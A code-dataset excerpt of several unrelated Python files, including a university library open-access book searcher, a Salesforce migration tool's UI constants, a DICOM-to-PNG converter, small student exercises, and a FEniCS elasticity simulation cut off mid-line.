'said',\n 'same', 'saw', 'say', 'says', 'see', 'seem', 'seen', 'self', 'sent', 'she', 'six', 'so', 'some', 'soon', 'sub',\n 'such', 'sup', 'sure', 't', 'take', 'tell', 'th', 'than', 'that', 'the', 'them', 'then', 'they', 'this', 'thru',\n 'thus', 'to', 'too', 'took', 'try', 'two', 'u', 'un', 'unto', 'up', 'upon', 'us', 'use', 'used', 'uses',\n 'uucp', 'v', 'very', 'via', 'viz', 'vs', 'w', 'want', 'was', 'way', 'we', 'well', 'went', 'were', 'what',\n 'when', 'who', 'whom', 'why', 'will', 'wish', 'with', 'x', 'y', 'yes', 'yet', 'you', 'your', 'z', 'zero')\n\ns = requests.Session()\n\n#UNC catalog function\ndef unc_searcher(title,author):\n # helper string\n oncheck = \"onlinefulltextavailable\"\n #compile regular expression\n regex = re.compile('[^a-zA-Z]')\n #string editing to make query\n title = title.lower()\n title = title.replace(\" \", \"+\")\n author = author.lower()\n author = author.replace(\" \", \"+\")\n #query for unc url\n query = title + \"+\" + author\n unc_url = \"https://catalog.lib.unc.edu/?utf8=%E2%9C%93&search_field=all_fields&q={query}&f%5Baccess_type_f%5D%5B%5D=Online\".format(\n query=query)\n unc_get = s.get(unc_url)\n #create bsoup object\n uncSoup = bs4.BeautifulSoup(unc_get.text, 'html.parser')\n #this is one way to select the items on the UNC page\n #using schema.org/Thing seemed like the best way\n unc_items = uncSoup.find_all(\"div\", {\"itemtype\": \"http://schema.org/Thing\"})\n\n title = regex.sub('', title)\n author = regex.sub('', author)\n #dictionary in case multiple links\n found_dic = {\"Found at UNC: \": []}\n unc_acc = 0\n for item in unc_items:\n search_soup = item.getText()\n search_clean = regex.sub('', search_soup)\n search_clean = search_clean.lower()\n if title in search_clean and author in search_clean and oncheck in search_clean:\n #for each item find all links\n link_elems = item.find_all(\"a\")\n link_urls = [x.get(\"href\") for x in link_elems]\n for url in link_urls:\n if url.startswith('/'):\n url = \"https://catalog.lib.unc.edu\" + url\n found_dic[\"Found at UNC: \"].append(url)\n unc_acc +=1\n\n if unc_acc > 0:\n return found_dic\n else:\n return \"Not found in UNC catalog.\"\n\n\n#hathi temp access searcher\ndef hathi_temp_access(title, author):\n title = title.lower()\n author = author.lower()\n title_unc = title.replace(\" \", \"+\")\n author_no_end_space = author.strip(\" \")\n author_unc = author_no_end_space.replace(\" \", \"+\")\n query = author_unc + \"+\" + title_unc\n hathi_url = \"https://catalog.lib.unc.edu/?utf8=%E2%9C%93&search_field=all_fields&q={query}&f%5Baccess_type_f%5D%5B%5D=Online\".format(\n query=query)\n hathi_get = s.get(hathi_url)\n hathiSoup = bs4.BeautifulSoup(hathi_get.text, 'html.parser')\n hathi_items = hathiSoup.find_all(\"div\", {\"itemtype\": \"http://schema.org/Thing\"})\n\n regex = re.compile('[^a-zA-Z]')\n title = regex.sub('', title)\n author = regex.sub('', author)\n #string for checking\n oncheck = \"temporarilyavailable\"\n hathi_dic = {\"Temporary access: \": []}\n hathi_acc = 0\n for item in hathi_items:\n search_soup = item.getText()\n search_clean = regex.sub('', search_soup)\n search_clean = search_clean.lower()\n if title in search_clean and author in search_clean and oncheck in search_clean:\n bib_num = item.get(\"data-document-id\")\n hathi_url = \"https://catalog.lib.unc.edu/catalog/\" + bib_num\n hathi_dic[\"Temporary access: \"].append(hathi_url)\n hathi_acc +=1\n\n if hathi_acc > 0:\n return hathi_dic\n else:\n return \"Not found in HathiTemp Access\"\n\n\n# search actual hathitrust site for always accessible\ndef hathi_full_time_access(title,author):\n title = title.lower()\n author = author.lower()\n author = author.strip(\" \")\n title_query = title.replace(\" \",\"+\")\n author_query = author.replace(\" \",\"+\")\n query = title_query + \"+\" + author_query\n ht_url = \"https://catalog.hathitrust.org/Search/Home?lookfor={query}&ft=ft&setft=true\".format(\n query=query)\n ht_page = s.get(ht_url)\n htSoup = bs4.BeautifulSoup(ht_page.text, 'html.parser')\n records = htSoup.select('.record')\n\n if len(records) > 0:\n hathi_acc = 0\n # get text for each record\n records_list = [x.getText() for x in records]\n # cleanup using regular expressions\n regex = re.compile('[^a-zA-Z]')\n record_clean_list = []\n for record in records_list:\n record_clean = regex.sub('', record)\n record_clean = record_clean.lower()\n record_clean_list.append(record_clean)\n # clean our search terms\n title_caps = regex.sub('', title)\n title_test = title_caps.lower()\n author_caps = regex.sub('', author)\n author_test = author_caps.lower()\n\n for record in record_clean_list:\n if title_test in record and author_test in record:\n hathi_acc += 1\n if hathi_acc > 0:\n return \"Found in HathiTrust fulltime access.\", ht_url\n else:\n return \"Not found in HathiTrust fulltime access.\"\n\n else:\n return \"Not found in HathiTrust fulltime access.\"\n\n\n###function for red_shelf_access\n###pretty much works\ndef red_shelf_access(title,author):\n title = title.lower()\n author = author.lower()\n query = title + \" \" + author\n red_query = query.replace(\" \", \"+\")\n red_shelf_url = 'https://studentresponse.redshelf.com/search/?terms=%s' %red_query\n red_shelf = s.get(red_shelf_url)\n \n redSoup = bs4.BeautifulSoup(red_shelf.text,'html.parser')\n red_items = redSoup.select(\".price-content\")\n if len(red_items) > 0:\n if \"Borrow through\" in red_items[0].getText():\n title_items = redSoup.select(\".title-row\")\n #print(title_items[0].getText())\n t1 = title_items[0].getText()\n #remove stopwords\n t1 = t1.lower()\n t1_list = t1.split()\n t1_no_stop = [word for word in t1_list if not word in stopwords]\n t2 = \"\".join(t1_no_stop)\n #remove stopwords from query\n title_list = title.split()\n title_no_stop = [word for word in title_list if not word in stopwords]\n title_nospace = \"\".join(title_no_stop)\n\n if title_nospace in t2:\n \n return \"Found in Red Shelf.\",red_shelf_url\n else:\n return \"Not found in Red Shelf.\"\n else:\n return \"Not found in Red Shelf\"\n else:\n return \"Not found in Red Shelf\"\n\n\n#open libray function\ndef open_library_access(title,author):\n title_open = title.replace(\" \", \"+\")\n author_no_end_space = author.strip(\" \")\n author_open = author_no_end_space.replace(\" \", \"+\")\n open_lib_url = 'https://openlibrary.org/search?title=%s&author=%s' %(title_open, author_open)\n open_lib = s.get(open_lib_url)\n openSoup = bs4.BeautifulSoup(open_lib.text,'html.parser')\n if 'No results found.' in open_lib.text:\n return 'Not found in Open Library.'\n\n else:\n open_items_elem = openSoup.select('.searchResultItemCTA-lending')\n acc = 0\n for x in range(len(open_items_elem)):\n if 'Not in Library' in open_items_elem[x].getText():\n continue\n else:\n acc +=1\n if acc > 0:\n #print(title)\n #print(author)\n return 'Found in Open Library.',open_lib_url\n\n else:\n return 'Not found in Open Library.'\n\n\n#basic searcher for the different books with spreadsheets\ndef spread_sheet_searcher(title,author,books,title_col,author_col,db_name):\n title = title.lower()\n author = author.lower()\n regex = re.compile('[^a-zA-Z]')\n title = regex.sub('', title)\n author = regex.sub('', author)\n acc = 0\n for row in range(1, books.nrows):\n # string cleanup for each\n book_title = books.cell_value(row, title_col)\n book_title = regex.sub('', book_title)\n book_title = book_title.lower()\n author_title = books.cell_value(row, author_col)\n author_title = regex.sub('', author_title)\n author_title = author_title.lower()\n if title in book_title and author in author_title:\n acc += 1\n if acc > 0:\n return \"Found in \"+ db_name\n else:\n return \"Not found in \"+ db_name\n\n\n###searching michigan fulcrum project\ndef michigan_searcher(title,author,searchtext):\n regex = re.compile('[^a-zA-Z]')\n title_search = regex.sub('',title)\n title_search = title_search.lower()\n author_search = regex.sub('',author)\n author_search = author_search.lower()\n if title_search in searchtext and author_search in searchtext:\n return \"Found in Michigan Press Open Access.\"\n else:\n return \"Not found in Michigan Press Open Access.\"\n\n\n#right now only searching ISSNs\ndef textbook_searcher(tb_issn_col,issn):\n if issn == \"\":\n return \"Not found in Students Stores textbook spreadsheet.\"\n else:\n for row in range(1,textbooks.nrows):\n if issn == str(textbooks.cell_value(row,tb_issn_col)):\n vital_query = title.replace(\" \", \"%20\")\n vital_url = \"https://bookshelf.vitalsource.com/#/search?q=%s\" % vital_query\n return \"Found in Textbooks\", \"Could be available here: \" + vital_url\n else:\n return \"Not found in Students Stores textbook spreadsheet.\"\n\n\n#Project Gutenberg searcher\n#currently using database GUTINDEX.txt\ndef pg_searcher(title_input,author_input,file):\n regex = re.compile('[^a-zA-Z]')\n title = regex.sub('', title_input)\n author = regex.sub('', author_input)\n title = title.lower()\n author = author.lower()\n acc = 0\n for line in file:\n line = line.lower()\n line = regex.sub('',line)\n if title in line and author in line:\n acc +=1\n\n if acc > 0:\n query = title_input + ' ' + author_input\n query = query.replace(' ', '+')\n gutenberg_url = \"http://www.gutenberg.org/ebooks/search/?query=%s\" % query\n return \"Found at Project Gutenberg.\", gutenberg_url\n else:\n return \"Not found at Project Gutenberg.\"\n\nprint(\"\\t\" + \"\\t\" + \"Welcome to the UNC online access searcher. Enter title/author or ISBN to search.\")\nprint(\"\\t\" + \"\\t\" + \"\\t\" + \"\\t\" + \"(must include ISBN to search textbook database)\")\nprint(\" \")\nprint(\" \")\nprint(\"LOADING FILES\")\n\n#ask whether or not to load\n####db spreadsheets for the following\n#jstor_cont = input(\"Search JSTOR open content? (press y): \")\njstor_cont = 'y'\nif jstor_cont == \"y\":\n print('Loading JSTOR database.')\n try:\n jstor_workbook = xlrd.open_workbook('jstor_books.xlsx')\n jstor_books = jstor_workbook.sheet_by_index(0)\n jstorheadings = jstor_books.row_values(0)\n jstortitle_col = jstorheadings.index('Title')\n jstorauthor_col = jstorheadings.index('Authors')\n except FileNotFoundError:\n print(\"jstor spreadsheet not found.\")\n print(\"If file exists rename: jstor_books.xlsx, and restart program. \")\n input(\"Press enter to continue: \")\n jstor_cont = \"n\"\n\n#muse_cont = input(\"Search Project Muse? (press y): \")\nmuse_cont = 'y'\nif muse_cont == \"y\":\n print('Loading Project Muse database.')\n try:\n muse_workbook = xlrd.open_workbook(\"project_muse_free_covid_book.xlsx\")\n muse_books = muse_workbook.sheet_by_index(0)\n museheadings = muse_books.row_values(0)\n musetitle_col = museheadings.index('Title')\n museauthor_col = museheadings.index('Contributor')\n except FileNotFoundError:\n print(\"Project Muse spreadsheet not found.\")\n print(\"If file exists rename: project_muse_free_covid_book.xlsx, and restart program.\")\n input(\"Press enter to continue: \")\n muse_cont = \"n\"\n\n#ohio_cont = input(\"Search Ohio State Press? (press y): \")\nohio_cont = 'y'\nif ohio_cont == \"y\":\n print('Loading OSU Press database.')\n try:\n ohio_workbook = xlrd.open_workbook(\"OhioStateUnivPress-OpenTitles-KnowledgeBank.xlsx\")\n ohio_books = ohio_workbook.sheet_by_index(0)\n ohioheadings = ohio_books.row_values(0)\n ohiotitle_col = ohioheadings.index('Title')\n ohioauthor_col = ohioheadings.index('Contributors')\n except FileNotFoundError:\n print(\"Ohio State Press open titles spreadsheet not found.\")\n input(\"Press enter to continue: \")\n ohio_cont = 'n'\n\n#science_direct_cont = input(\"Science Direct? (press y): \")\nscience_direct_cont = 'y'\nif science_direct_cont == \"y\":\n print('Loading Science Direct database.')\n try:\n sd_workbook = xlrd.open_workbook(\"sciencedirect.xlsx\")\n sd_books = sd_workbook.sheet_by_index(0)\n sdheadings = sd_books.row_values(0)\n sdtitle_col = sdheadings.index(\"publication_title\")\n sdauthor_col = sdheadings.index(\"first_author\")\n except FileNotFoundError:\n print(\"Science Direct items spreadsheet not found.\")\n print(\"If file exists rename: sciencedirect.xlsx, and restart program.\")\n input(\"Press enter to continue: \")\n science_direct_cont = 'n'\n\n#michigan searcher\n#michigan_cont = input(\"Search Michigan Press? (press y): \")\nmichigan_cont = 'y'\nif michigan_cont == \"y\":\n print('Loading Michigan database.')\n fulcrum_searchtxt = \"\"\n regex = re.compile('[^a-zA-Z]')\n for n in range(1,13):\n fulcrum = s.get(\"https://www.fulcrum.org/michigan?locale=en&page={n}&per_page=1000&view=list\".format(n=n))\n fulcrumSoup = bs4.BeautifulSoup(fulcrum.text,'html.parser')\n fulcrumSouptags = fulcrumSoup.select(\"#documents\")\n fulcrumugly = fulcrumSouptags[0].getText()\n fulcrumtext = regex.sub('', fulcrumugly)\n fulcrumtext = fulcrumtext.lower()\n fulcrum_searchtxt = \"\".join([fulcrum_searchtxt,fulcrumtext])\n\n#vitalsource/textbook searcher\n#could be used for general textbook searching\n#vitalsource_cont = input(\"Search textbooks/vitalsource? (press y): \")\nvitalsource_cont = 'y'\nif vitalsource_cont == \"y\":\n print('Loading textbook database.')\n try:\n textbook_workbook = xlrd.open_workbook('Spring 2020 Book List.xlsx')\n textbooks = textbook_workbook.sheet_by_index(0)\n tb_issn_col = 2\n except FileNotFoundError:\n print(\"Textbooks spreadsheet not found.\")\n print(\"If file exists rename: Spring 2020 Book List.xlsx, and restart program.\")\n input(\"Press enter to continue: \")\n vitalsource_cont = 'n'\n\n#search gutenberg text file\n#gutenberg_cont = input(\"Search Project Gutenberg? (press y): \")\ngutenberg_cont = 'y'\nif gutenberg_cont == 'y':\n print('Loading Gutenberg database.')\n try:\n fin = open('GUTINDEX.txt', encoding=\"utf-8\")\n except FileNotFoundError:\n print(\"GUTINDEX.txt file not found.\")\n input(\"Press enter to continue: \")\n gutenberg_cont = 'n'\n\n###helper functions###\n#helper function for appending and printing\n#what is returned from functions\ndef return_helper(result,list):\n if result.__class__.__name__ == 'tuple':\n for item in result:\n print(item)\n list.append(item)\n elif result.__class__.__name__ == 'dict':\n for key in result:\n print(key)\n list.append(key)\n for elem in result[key]:\n print(elem)\n list.append(elem)\n else:\n print(result)\n list.append(result)\n\n\n#helper for converting list to textfile\ndef list_to_file(var_list,name):\n file_name = name + '.txt'\n #open file for writing\n outfile = open(file_name, 'w',encoding='utf-8')\n #write the list to file\n for item in var_list:\n outfile.write(item + '\\n')\n outfile.close()\n return file_name\n\nprint(\" \")\ncont = \"y\"\nwhile cont == \"y\":\n request = []\n title_long = input(\"Enter title: \")\n title_split = title_long.split(':')\n title = title_split[0]\n author_num = input(\"Enter author: \")\n author = \"\"\n if len(author_num) > 0:\n for i in author_num:\n if i.isalpha() or i.isspace():\n author = \"\".join([author, i])\n if vitalsource_cont == \"y\":\n issn = input('Enter ISBN: ')\n\n print(title.upper())\n request.append(title.upper())\n print(author)\n request.append(author)\n\n unc_result = unc_searcher(title,author)\n return_helper(unc_result,request)\n\n hathi_temp_result = hathi_temp_access(title,author)\n return_helper(hathi_temp_result,request)\n hathi_full_time_result = hathi_full_time_access(title,author)\n return_helper(hathi_full_time_result,request)\n\n open_library_result = open_library_access(title,author)\n return_helper(open_library_result,request)\n red_shelf_result = red_shelf_access(title,author)\n return_helper(red_shelf_result,request)\n\n if jstor_cont == \"y\":\n return_helper(spread_sheet_searcher(title,author,jstor_books,jstortitle_col,jstorauthor_col,\"JSTOR.\"),request)\n if muse_cont == \"y\":\n return_helper(spread_sheet_searcher(title,author,muse_books,musetitle_col,museauthor_col,\"Project Muse.\"),request)\n if ohio_cont == 'y':\n return_helper(spread_sheet_searcher(title,author,ohio_books,ohiotitle_col,ohioauthor_col,\"Ohio State Uni Press.\"),request)\n if science_direct_cont == 'y':\n return_helper(spread_sheet_searcher(title,author,sd_books,sdtitle_col,sdauthor_col,\"Science Direct Holdings.\"),request)\n if michigan_cont == \"y\":\n return_helper(michigan_searcher(title,author,fulcrum_searchtxt),request)\n if vitalsource_cont == \"y\":\n return_helper(textbook_searcher(tb_issn_col,issn),request)\n if gutenberg_cont == \"y\":\n return_helper(pg_searcher(title,author,fin),request)\n print('----------------')\n request.append('----------------')\n list_to_file(request,title + \"_\" \"results\")\n\n print(\"Another search? (press y) Enter any other button to exit.\")\n cont = input(\"Enter: \")\n\n","repo_name":"jonpage3/open_access_searchers","sub_path":"online_request_searcher.py","file_name":"online_request_searcher.py","file_ext":"py","file_size_in_byte":19420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26102579621","text":"APP_NAME = 'User Migration Tool'\nTHEME = 'blue'\nMODE = 'Dark'\nDEFAULT_SIZE = '800x600'\nFONT_NAME = 'Consolas'\nSELECT_SCRIPT_LABEL = 'SELECT SCRIPT'\nSELECT_OBJECT_LABEL = 'SELECT OBJECT'\nRUN_SCRIPT_BTN = 'Execute Script'\nSHOW_LOGS_BTN = 'show logs'\nSHOW_FILES_BTN = 'show files'\nSHOW_USERS_BTN = 'Locate Users'\nSHOW_CREDS_BTN = 'Locate Creds'\n\n# DO NOT CHANGE THIS\nscript_options = [\n 'SELECT',\n 'EXTRACT',\n 'INSERT'\n]\n\ndefault_objects = [\n 'SELECT Object'\n]\n\nextraction_objects = [\n \"Contact\",\n \"User\",\n \"PermissionSetAssignment\",\n \"GEIDP_Customer_App_Role_Access__c\",\n \"Contact_Additional_Information__c\",\n \"GEIDPUsersFromManualRegFlow__c\",\n \"GEIDP_Entitled_Feature__c\",\n \"ALL OBJECTS\"\n]\n\ninsertion_objects = [\n \"Contact\",\n \"User\",\n \"PermissionSetAssignment\",\n \"GEIDP_Customer_App_Role_Access__c\",\n \"Contact_Additional_Information__c\",\n \"GEIDPUsersFromManualRegFlow__c\",\n \"GEIDP_Entitled_Feature__c\",\n]\n\ntext1 = 'STEPS'\ntext2 = 'Click on Locate Creads :\\n \\tupdate creds json files'\ntext3 = 'Click on Locate Users :\\n \\tupdate user_emails.py'\ntext4 = 'Restart the application'\ntext5 = 'Select Script Type'\ntext6 = 'Select Object'\ntext7 = 'Click on Execute Script'\ntext8 = 'check logs and files'\ntext9 = 'Go slow!!!'\n\ntext_lst = [text1,text2,text3,text4,text5,text6,text7,text8,text9]","repo_name":"mithileshjoshi100/salesforce-data-migration","sub_path":"app/gui/magic_strings.py","file_name":"magic_strings.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19994165242","text":"# for SIIM-ACR dataset\r\nimport os\r\nimport cv2\r\nimport pydicom\r\nimport numpy as np\r\nimport skimage.transform as transform\r\n\r\ndef dcm2jpeg(file, dst_path):\r\n print('FIle:', file)\r\n ds = pydicom.dcmread(file, force=True)\r\n # ds.file_meta.TransferSyntaxUID =\r\n # ds.file_meta.TransferSyntaxUID = pydicom.uid.ImplicitVRLittleEndian\r\n ori_img = np.array(ds.pixel_array)\r\n\r\n sharp = ori_img.shape\r\n _h = sharp[0]\r\n _w = sharp[1]\r\n if len(sharp) == 3:\r\n ori_img = ori_img[:, :, 0]\r\n img = transform.resize(ori_img, (_h, _w))\r\n\r\n start = img.min()\r\n end = img.max()\r\n\r\n img[img < start] = start\r\n img[img > end] = end\r\n img = np.array((img - start) * 255.0 / (end - start))\r\n if hasattr(ds, 'PhotometricInterpretation'):\r\n if ds.PhotometricInterpretation == 'MONOCHROME1':\r\n img = 255 - img\r\n\r\n # img_name = os.path.basename(file).lower()\r\n # jpeg_path = str(ds.PatientID) + '_' + str(ds.SeriesDate) + '_' + str(ds.PatientSex) + '_'+str(ds.PatientAge) + '%d' % idx + '.jpeg'\r\n jpeg_name = os.path.basename(file).replace('.dcm', '.png')\r\n save_path = os.path.join(dst_path, jpeg_name)\r\n print(save_path)\r\n\r\n img = img.astype(np.uint8)\r\n cv2.imwrite(save_path, img, [int(cv2.IMWRITE_JPEG_QUALITY), 90])\r\n print('save ok')\r\n return jpeg_name\r\n\r\n\r\ndef do_convert(file_path, png_folder):\r\n try:\r\n jpeg_path = dcm2jpeg(file_path, png_folder)\r\n\r\n except Exception as e:\r\n print('main process has error:%s' % e)\r\n\r\n\r\ndef run():\r\n ini_folder = '/sda1/zhouziyu/ssl/dataset/siim-acr-pneumothorax-segmentation/pneumothorax/dicom-images-train'\r\n jpeg_folder = '/sda1/zhouziyu/ssl/dataset/siim-acr-pneumothorax-segmentation/pneumothorax/png-images-train'\r\n for root, dirs, files in os.walk(ini_folder):\r\n for file in files:\r\n print(file)\r\n file_path = os.path.join(root, file)\r\n\r\n print('_pro' in file)\r\n if '_pro' in file:\r\n continue\r\n if file.lower().endswith('dcm') or file.lower().endswith('dicom'):\r\n do_convert(file_path, jpeg_folder)\r\n print('ok')\r\n\r\nif __name__ == '__main__':\r\n run()\r\n","repo_name":"Zhouziyuya/Benchmark","sub_path":"utils_zzy/dcm2jpeg_simple.py","file_name":"dcm2jpeg_simple.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"27925452705","text":"#!/bin/python\nfrom itertools import product\n\nopNames = {\n (False, False, False, False): 'Constant False',\n (False, False, False, True): 'AND',\n (False, False, True, False): 'NOT p Implies q',\n (False, False, True, True): 'p',\n (False, True, False, False): 'NOT p Implied By q',\n (False, True, False, True): 'q',\n (False, True, True, False): 'XOR',\n (False, True, True, True): 'OR',\n (True, False, False, False): 'NOR',\n (True, False, False, True): 'XNOR',\n (True, False, True, False): 'NOT q',\n (True, False, True, True): 'p Implied by q',\n (True, True, False, False): 'NOT p',\n (True, True, False, True): 'p Implies q',\n (True, True, True, False): 'NAND',\n (True, True, True, True): 'Constant True'\n}\n\nisCommutative = {}\nisAssociative = {}\n\ndef makeOp(ff, ft, tf, tt):\n return lambda x, y: (tt if y else tf) if x else (ft if y else ff)\n\ndef truthTable(n):\n return product([False, True], repeat=n)\n\ndef commutative():\n for ff, ft, tf, tt in truthTable(4):\n op = makeOp(ff, ft, tf, tt)\n\n found = False\n\n x, y = False, True\n xy = op(x, y)\n yx = op(y, x)\n if xy != yx:\n print(f'Not commutative: {opNames[(ff, ft, tf, tt)]} {x} * {y} != {y} * {x}')\n found = True\n \n isCommutative[(ff, ft, tf, tt)] = not found\n if not found:\n print(f'Commutative: {opNames[(ff, ft, tf, tt)]}')\n\ndef associative():\n for ff, ft, tf, tt in truthTable(4):\n op = makeOp(ff, ft, tf, tt)\n\n found = False\n\n for x, y, z in truthTable(3):\n xy_z = op(op(x, y), z)\n x_yz = op(x, op(y, z))\n if xy_z != x_yz:\n print(f'Not associative: {opNames[(ff, ft, tf, tt)]} ({x} * {y}) * {z} != {x} * ({y} * {z})')\n found = True\n\n isAssociative[(ff, ft, tf, tt)] = not found\n if not found:\n print(f'Associative: {opNames[(ff, ft, tf, tt)]}')\n\nif __name__ == '__main__':\n commutative()\n associative()\n for key in truthTable(4):\n print(f'{opNames[key]}\\t{isCommutative[key]}\\t{isAssociative[key]}')\n","repo_name":"djohn833/code-snippets","sub_path":"logic/BoolAssocBinOp.py","file_name":"BoolAssocBinOp.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"33752264308","text":"# 350111\n# a5_p1.py\n# Amish Kapri\n# a.kapri@jacobs-universty.de\n\n\nlist1 = []\nnumber= int(input(\"Enter list length \"))\nprint(\"Enter number\")\nwhile len(list1) !=number:\n data = float(input())\n list1.append(data)\n print(list1)\nValue = 1.5\ndef add(list1,Value):\n for i in range(0,number):\n list1[i] = list1[i]+1.5\n return list1 \ndef multiply(list1,Value):\n for i in range(0,number):\n list1[i] = list1[i]*5\n return list1\n\nprint(add(list1,Value))\nprint(multiply(list1,Value))\n","repo_name":"amishkapri/Python","sub_path":"a5_p1.py","file_name":"a5_p1.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"24845335363","text":"# Eduardo Nunes\nfrom turtle import *\n\nscreen = Screen()\nscreen.setup(900, 850)\npensize(3)\ncolor(\"black\", \"yellow\")\nspeed(5)\npenup()\n\n\n# INACABADO\n\ndef desenhar(raio):\n # main quadrado\n goto(-raio, -raio)\n pendown()\n begin_fill()\n for x in range(4):\n forward(raio * 2)\n left(90)\n end_fill()\n penup()\n\n # circulos\n rcirculo = (-raio * 0.75)\n color(\"black\", \"black\")\n goto(0, 0)\n for x in range(3):\n pendown()\n begin_fill()\n if x == 0:\n forward(rcirculo)\n left(90)\n circle(rcirculo, 60)\n left(90)\n forward(rcirculo)\n\n elif x == 1:\n left(60)\n forward(rcirculo)\n right(90)\n circle(-rcirculo, 60)\n right(90)\n forward(rcirculo)\n\n elif x == 2:\n left(60)\n forward(rcirculo)\n left(90)\n circle(rcirculo, 60)\n\n end_fill()\n penup()\n\n # circulo centro\n color(\"yellow\", \"black\")\n goto(0, -raio*0.15)\n setheading(0)\n\n begin_fill()\n pendown()\n circle(raio * 0.15)\n end_fill()\n penup()\n\n\ndesenhar(150)\nhideturtle()\nTerminator()\ndone()\n","repo_name":"PolpEdu/AulaIPRP","sub_path":"Exercicios IPRP da aula prática/Capitulo 2/2.17.py","file_name":"2.17.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"3086966394","text":"#docker pull multiphenics/multiphenics\n#sudo docker run --shm-size=15g --cpus=8 -ti -v $(pwd):/home/fenics/shared multiphenics/multiphenics\nimport dolfin as df \nimport matplotlib.pyplot as plt \nimport mshr\nfrom matplotlib import rc, rcParams\nimport multiphenics as mph\nimport time\n\n# plot parameters\nplt.style.use('bmh') \nparams = {'axes.labelsize': 'large',\n 'font.size': 22,\n 'axes.titlesize': 'large',\n 'legend.fontsize': 18,\n 'figure.titlesize': 24,\n 'xtick.labelsize': 18,\n 'ytick.labelsize': 18,\n 'figure.figsize':(10,8), \n 'legend.shadow': True,\n 'patch.edgecolor': 'black'}\nplt.rcParams.update(params)\n\n# dolfin parameters\ndf.parameters[\"ghost_mode\"] = \"shared_facet\" \ndf.parameters[\"form_compiler\"][\"cpp_optimize\"] = True\ndf.parameters[\"form_compiler\"][\"optimize\"] = True\ndf.parameters['allow_extrapolation'] = True\ndf.parameters[\"form_compiler\"][\"representation\"] = 'uflacs'\n\n\n\n \n\n# degree of interpolation for V and Vphi\ndegV = 2\ndegPhi = 1 + degV \n\n\n# elastic parameters\nE1 = 7.0\nnu1 = 0.3\nlambda_1 = E1*nu1/((1.0+nu1)*(1.0-2.0*nu1))\nmu1 = E1/(2.0*(1.0+nu1))\nE2 = 2.28\nnu2 = 0.3\nlambda_2 = E2*nu2/((1.0+nu2)*(1.0-2.0*nu2))\nmu2 = E2/(2.0*(1.0+nu2))\n\n# size of the circle in the domain\nR = 0.3\n\n# expression of phi\nclass phi_expr(df.UserExpression) : \n def eval(self, value, x):\n value[0] = -R**2 + (x[0]-0.5)**2 + (x[1] - 0.5)**2 \n\n def value_shape(self):\n return (1,)\n\n# functions and parameters for elasticity\ndef sigma1(u):\n return lambda_1 * df.div(u)*df.Identity(2) + 2.0*mu1*epsilon(u)\n\ndef sigma2(u):\n return lambda_2 * df.div(u)*df.Identity(2) + 2.0*mu2*epsilon(u)\n\ndef epsilon(u):\n return (1.0/2.0)*(df.grad(u) + df.grad(u).T)\n\n\n\nclass sol_exact(df.UserExpression):\n def eval(self, value, x):\n r = pow(pow(x[0]-0.5,2) + pow(x[1] - 0.5,2),0.5)\n a = df.as_vector((df.cos(r)-df.cos(R), df.cos(r)-df.cos(R) ))\n if r 0.0 or phi(v2.point()) > 0.0 or phi(v3.point()) > 0.0 \n or df.near(phi(v1.point()),0.0) or df.near(phi(v2.point()),0.0) or df.near(phi(v3.point()),0.0)):\n Cell[cell] = omega2 \n cell_sub[cell] = 1\n for facett in df.facets(cell):\n Facet[facett] = omega2 \n facet_sub[facett] = 1\n v1, v2 = df.vertices(facett)\n vertices_sub[v1], vertices_sub[v2] = 1,1\n File2 = df.File(\"omega2.rtc.xml/mesh_function_2.xml\")\n File2 << cell_sub\n File1 = df.File(\"omega2.rtc.xml/mesh_function_1.xml\")\n File1 << facet_sub\n File0 = df.File(\"omega2.rtc.xml/mesh_function_0.xml\")\n File0 << vertices_sub\n Omega2 = mph.MeshRestriction(mesh,\"omega2.rtc.xml\")\n\n # creation of the restricition for the interface\n cell_sub.set_all(0)\n facet_sub.set_all(0)\n vertices_sub.set_all(0)\n for cell in df.cells(mesh): \n for facet in df.facets(cell): \n v1,v2 = df.vertices(facet) \n if(phi(v1.point())*phi(v2.point()) < 0.0 or df.near(phi(v1.point())*phi(v2.point()), 0.0)): \n Cell[cell] = interf\n cell_sub[cell] = 1\n for facett in df.facets(cell): \n Facet[facett] = interf\n facet_sub[facett] = 1\n v1, v2 = df.vertices(facett)\n vertices_sub[v1], vertices_sub[v2] = 1,1\n \n File2 = df.File(\"interface.rtc.xml/mesh_function_2.xml\")\n File2 << cell_sub\n File1 = df.File(\"interface.rtc.xml/mesh_function_1.xml\")\n File1 << facet_sub\n File0 = df.File(\"interface.rtc.xml/mesh_function_0.xml\")\n File0 << vertices_sub\n Interface = mph.MeshRestriction(mesh,\"interface.rtc.xml\")\n \n for cell in df.cells(mesh):\n if Cell[cell] == omega2 :\n for facet in df.facets(cell) :\n if Facet[facet] == interf :\n Facet[facet] = gamma1\n\n if Cell[cell] == omega1 :\n for facet in df.facets(cell) :\n if Facet[facet] == interf :\n Facet[facet] = gamma2 \n \n # creation of the spaces \n V = df.VectorFunctionSpace(mesh, 'CG', degV, dim=2)\n Z = df.TensorFunctionSpace(mesh,\"CG\",degV, shape = (2,2))\n if degV == 1:\t\n Q = df.VectorFunctionSpace(mesh,\"DG\",degV, dim = 2)\n else:\n Q = df.VectorFunctionSpace(mesh,\"CG\",degV, dim = 2)\n W = mph.BlockFunctionSpace([V,V,Z,Z,Q], restrict=[Omega1, Omega2, Interface, Interface, Interface])\n uyp = mph.BlockTrialFunction(W)\n (u1, u2, y1, y2, p) = mph.block_split(uyp)\n vzq = mph.BlockTestFunction(W)\n (v1, v2, z1, z2, q) = mph.block_split(vzq)\n \n # modification of the measures\n dx = df.Measure(\"dx\", mesh, subdomain_data = Cell)\n ds = df.Measure(\"ds\", mesh, subdomain_data = Facet)\n dS = df.Measure(\"dS\", mesh, subdomain_data = Facet)\n \n # parameters for the considered case\n gamma_div, gamma_u, gamma_p, gamma_y, sigma_p = 